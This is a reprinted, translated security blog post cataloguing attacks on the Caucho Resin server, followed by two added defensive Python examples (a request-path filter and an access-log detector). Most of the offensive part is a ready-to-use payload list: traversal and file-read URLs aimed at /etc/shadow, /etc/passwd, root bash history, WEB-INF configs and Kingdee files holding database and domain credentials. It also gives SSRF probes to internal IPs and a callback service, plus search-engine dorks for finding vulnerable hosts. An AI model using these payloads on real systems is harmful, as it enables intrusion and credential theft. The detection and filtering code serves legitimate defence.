Reprinted from http://blkstone.github.io/2017/10/30/resin-attack-vectors/
0x01 CVE-2006-1953 Resin for Windows remote directory traversal
References
https://www.rapid7.com/resources/advisories/R7-0024.jsp
http://www.nsfocus.net/vulndb/8829
Affected versions
Affected systems: Caucho Technology Resin v3.0.18 for Windows, Caucho Technology Resin v3.0.17 for Windows
Test URLs
http://victim.com/C:%5C/
http://victim.com/D:%5C/
http://victim.com/E:%5C/
http://victim.com/F:%5C/
0x02 Resin %20 arbitrary file read
http://webscan.360.cn/vul/view/vulid/3528
Resin for Windows vulnerabilities
Vulnerability description
Resin for Windows has multiple implementation flaws that a remote attacker may exploit to obtain sensitive information without authorization. Resin does not properly filter input passed in the URL, which allows a remote attacker to read a continuous data stream from any COM or LPT device on the system by supplying a DOS device filename with an arbitrary extension in the URL, to disclose the contents of files under a web application's WEB-INF directory through a directory traversal attack, or to disclose the full filesystem path of the Caucho Resin server through a URL containing special characters.
Affected versions
Caucho Resin Professional v3.1.0 for Windows
Caucho Resin v3.1.0 for Windows
Caucho Resin v3.0.21 for Windows
Caucho Resin v3.0.20 for Windows
Caucho Resin v3.0.19 for Windows
Caucho Resin v3.0.18 for Windows
Caucho Resin v3.0.17 for Windows
KNOWN FIXED:
Caucho Resin v3.1.1 for Windows
Caucho Resin Professional v3.1.1 for Windows
Test URLs
http://www.example.com:8080/[path]/[device].[extension]
http://www.example.com:8080/%20../web-inf
http://www.example.com:8080/%20
http://www.example.com:8080/[path]/%20.xtp
Impact
Through this vulnerability an attacker can read data from serial (COM/LPT) devices and list files in any directory of the site.
Omitted; payloads to be added later.
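The three bugs described above share one root cause: the path is checked in its raw, percent-encoded form, while the Windows filesystem interprets it after trimming surrounding whitespace, stripping trailing dots and honouring reserved device names. The following is an added example, not code from the original post or from Caucho Resin, of the kind of request-path check a front-end filter should apply before mapping a URL onto the web root. Function and constant names are hypothetical; the rejection rules are derived from the test URLs listed in this section.

```python
# Added example (hypothetical filter, not Resin's own code): reject request
# paths whose meaning changes once the OS normalizes them.
import re
from urllib.parse import unquote

# Windows reserved device names. "COM1.txt" still opens the serial port,
# because the OS ignores the extension when resolving device names.
DOS_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Directories a servlet container must never serve directly.
PROTECTED_DIRS = {"web-inf", "meta-inf"}

# A drive-letter root such as "C:/" (decoded from "/C:%5C/") inside a URL path.
DRIVE_ROOT = re.compile(r"(^|/)[A-Za-z]:(/|$)")


def is_safe_request_path(raw_path: str) -> bool:
    """Return True only if raw_path is safe to map onto the web root.

    Decoding happens first (twice, so a double-encoded "%2520.." is caught too;
    this is stricter than a pure decoder, which is the right trade-off for a
    reject-list filter). Every segment is then compared against its
    OS-normalized form: " .." is not "..", but Windows treats it as the parent
    directory once the leading space is trimmed, which is exactly what the
    "%20../web-inf" URL relies on.
    """
    path = unquote(unquote(raw_path)).replace("\\", "/")

    if DRIVE_ROOT.search(path):
        return False

    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            # Plain traversal; containers normalize it, a filter just refuses it.
            return False
        # Windows drops leading/trailing spaces and trailing dots, so a segment
        # that changes under that normalization ("%20..", "%20.xtp", "%20")
        # would be resolved to a different name than the one that was checked.
        if seg != seg.strip().rstrip("."):
            return False
        if seg.lower() in PROTECTED_DIRS:
            return False
        # Device names are matched on the stem, ignoring any extension.
        if seg.split(".")[0].upper() in DOS_DEVICES:
            return False
    return True


if __name__ == "__main__":
    # Constructed sample paths taken from the patterns discussed above.
    for p in ["/%20../WEB-INF/", "/C:%5C/", "/app/COM1.txt", "/app/%20.xtp",
              "/%20", "/%2520../web-inf/", "/index.jsp", "/css/default.css"]:
        print(f"{p!r:28} safe={is_safe_request_path(p)}")
```

Note that the check is applied to the decoded path, never to the raw one; a rule that looks for the literal string `%20..` is bypassed by `%2520..` or by a client that sends the space unencoded.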
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/nginx/conf/nginx.conf
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/sysconfig/network-scripts/ifcfg-eth1
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=~/.bashrc_history
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bashrc_history
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/www/nagios/WEB-INF/nagios.conf
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/nagios/etc/hostgroup.cfg
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
0x04 Resin viewfile arbitrary file read
Omitted; payloads to be added later.
/resin-doc/viewfile/?file=index.jsp
/resin-doc/viewfile/?file=config.xml
/resin-doc/viewfile/?file=WEB-INF/web.xml
/resin-doc/viewfile/?file=WEB-INF/resin-web.xml
/resin-doc/viewfile/?file=css/default.css
/resin-doc/viewfile/?file=examples/amber-session/WEB-INF/classes/example/User.java
/resin-doc/viewfile/?file=images/hbleed.gif
0x10 Payloads
/usr/local/resin/conf/resin.conf
# Base payloads
/resin-doc/viewfile/?file=/WEB-INF/web.xml
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=[remote server (Ceye)]/[internal IP]
/%20../WEB-INF/
# Weak credentials
/resin-admin/status.php
# Derived payloads
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/nginx/conf/nginx.conf
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/sysconfig/network-scripts/ifcfg-eth1
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=~/.bashrc_history
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bashrc_history
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/www/nagios/WEB-INF/nagios.conf
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/opt/nagios/etc/hostgroup.cfg
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
/resin-doc/viewfile/?file=/WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
/resin-doc/viewfile/?contextpath=/&servletpath=&file=/etc/hosts
/resin-doc/viewfile/?contextpath=/&servletpath=&file=/etc/shadow
/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=./&servletpath=&file=WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=C:\&servletpath=&file=boot.ini
/resin-doc/viewfile/?file=index.jsp
/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp
/resin-doc/examples/jndi-appconfig/test?inputFile=C:\Windows\system.ini
# Payloads for Kingdee
/kingdee/%20../web-inf/
/kingdee/%20../editor/
/kingdee/%20../disk/
# AD domain server account and password (may not be configured)
/kingdee/%20../web-inf/classes/ad_config.conf
# ctop database account and password
/kingdee/%20../web-inf/classes/ctop.conf
# SMS gateway
/kingdee/%20../web-inf/classes/sms_config.conf
# Kingdee variant
/ctop/%20../web-inf/
# Potential bypasses
/%20../web-inf/
/%20../WEB-INF/
# Potential SSRF
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://10.0.201.75
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=https://www.secpulse.com/robots.txt
/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=[remote server (Ceye)]
# CVE-2006-1953
/A:%5C/
/B:%5C/
/C:%5C/
/D:%5C/
/E:%5C/
/F:%5C/
/G:%5C/
/H:%5C/
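The payload families above (the `%20..` traversal, the `jndi-appconfig/test?inputFile=` and `viewfile` readers, the drive-letter roots of CVE-2006-1953, DOS device names and `/resin-admin/`) are easy to recognise in web-server access logs once the request target is percent-decoded. The following is an added example, not code from the original post, that tags matching log lines and counts hits per client. The log lines are constructed for the example and the rule set is an assumption drawn from the payloads listed on this page, not a vendor signature.

```python
# Added example (not from the original post): tag access-log lines carrying
# the Resin payload families catalogued above and aggregate hits per client.
import re
from collections import Counter
from urllib.parse import unquote

# Each rule is (tag, regex); regexes run against the percent-decoded target.
RULES = [
    ("resin-doc-inputfile", re.compile(r"/resin-doc/.*/jndi-appconfig/test\?.*inputFile=", re.I)),
    ("resin-doc-viewfile", re.compile(r"/resin-doc/.*viewfile", re.I)),
    # "%20.." decodes to " ..": a segment of spaces followed by "..".
    ("space-dotdot-traversal", re.compile(r"(^|/) +\.\.(/|$)")),
    # "/C:%5C/" decodes to "/C:\/": a drive-letter root at the start of the path.
    ("drive-root", re.compile(r"^/[A-Za-z]:[\\/]")),
    # Reserved device name as a path segment, with or without an extension.
    ("dos-device", re.compile(r"/(CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9])(\.[^/?]*)?(\?|$)", re.I)),
    ("resin-admin", re.compile(r"^/resin-admin/", re.I)),
]

# Common Log Format, enough fields for this example.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2015:10:01:02 +0800] "GET /%20../WEB-INF/ HTTP/1.1" 200 1432
203.0.113.7 - - [12/Jun/2015:10:01:05 +0800] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd HTTP/1.1" 200 2210
203.0.113.7 - - [12/Jun/2015:10:01:09 +0800] "GET /resin-doc/viewfile/?contextpath=/&servletpath=&file=/etc/hosts HTTP/1.1" 200 310
198.51.100.4 - - [12/Jun/2015:10:02:00 +0800] "GET /C:%5C/ HTTP/1.1" 200 5120
198.51.100.4 - - [12/Jun/2015:10:02:03 +0800] "GET /app/COM1.txt HTTP/1.1" 500 0
192.0.2.10 - - [12/Jun/2015:10:03:00 +0800] "GET /index.jsp HTTP/1.1" 200 8800
192.0.2.10 - - [12/Jun/2015:10:03:01 +0800] "GET /css/default.css HTTP/1.1" 200 1200
"""


def classify_request(target: str) -> list:
    """Return the tags of every rule matching the decoded request target."""
    decoded = unquote(unquote(target))  # two passes catch double encoding
    return [tag for tag, rx in RULES if rx.search(decoded)]


def scan_log(lines) -> list:
    """Return (ip, target, status, tags) for each line matching any rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        tags = classify_request(m["target"])
        if tags:
            hits.append((m["ip"], m["target"], int(m["status"]), tags))
    return hits


def hits_per_ip(hits) -> dict:
    """Count flagged requests per client, the usual pivot for triage."""
    return dict(Counter(ip for ip, _, _, _ in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for ip, target, status, tags in found:
        print(f"{ip:14} {status} {','.join(tags):24} {target}")
    print(hits_per_ip(found))
```

A 200 status on a flagged `%20..` or `inputFile=` request is the signal worth paging on: it means the container served the file rather than rejecting the path. The same rules are cheap to port to a WAF or SIEM, provided the engine matches on the decoded target as this code does.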
0x11 Case studies
Main period of activity: June 2015 to December 2015
https://web.archive.org/web/20130915134701/https://www.rapid7.com/resources/advisories/R7-0028.jsp
https://www.rapid7.com/resources/advisories/R7-0028.jsp
https://www.rapid7.com/resources/advisories/R7-0029.jsp
https://www.rapid7.com/resources/advisories/R7-0030.jsp
a. %20 arbitrary file read
Resin exploitation case: directory traversal, using a Kingdee system as the example https://www.secpulse.com/archives/39144.html
A China Life site has a Resin directory traversal vulnerability that leaks details of multiple internal databases https://www.secpulse.com/archives/41485.html
A Hexun sub-site: Resin arbitrary file read, with a bonus XSS https://www.secpulse.com/archives/37175.html
A Hexun site: arbitrary file read and SSRF https://www.secpulse.com/archives/34659.html
A 21CN site: arbitrary file read and SSRF allowing internal network probing (successful Resin exploitation case) https://www.secpulse.com/archives/40166.html
c. viewfile arbitrary file read
58.com vulnerability collection (arbitrary upload, Resin remote file read, etc.) https://www.secpulse.com/archives/15056.html
Baihe.com: from Resin file read to webshell https://www.secpulse.com/archives/14755.html
iQiyi Resin configuration vulnerability https://www.secpulse.com/archives/13485.html
Sohu Resin configuration vulnerability leading to sensitive information disclosure https://www.secpulse.com/archives/12074.html
China Southern Power Grid International: Resin arbitrary file read https://www.secpulse.com/archives/9536.html
d. CVE-2006-1953 Resin for Windows remote directory traversal
Resin exploitation case: Windows full-disk traversal (a provincial drug rehabilitation center as the example) https://www.secpulse.com/archives/37313.html
Wanhu OA: Wanhu Network's outdated Resin version leaks disk information of customer sites https://www.secpulse.com/archives/30621.html
Sites built by Wanhu Network use an outdated Resin middleware version, leaking disk information of many customer sites https://www.secpulse.com/archives/20697.html
e. Weak credentials
Multiple Resin weak credentials at Renren https://www.secpulse.com/archives/29247.html
Two 17173 sites with Resin weak credentials https://www.secpulse.com/archives/24364.html
0x12 Automated target discovery
inurl:jndi-appconfig/test
Shodan
FOFA/Zoomeye
0x13 Supplement
Ceye receives and visualizes HTTP blind attacks; see Cplushua (Gong Hua)'s talk on HTTP blind attacks (Freebuf open course). "Blind attack" here means an attack whose result is not echoed back in the response.
http://ceye.io/record/index
https://sso.telnet404.com/cas/login?service=http%3A%2F%2Fceye.io%2Flogin%2F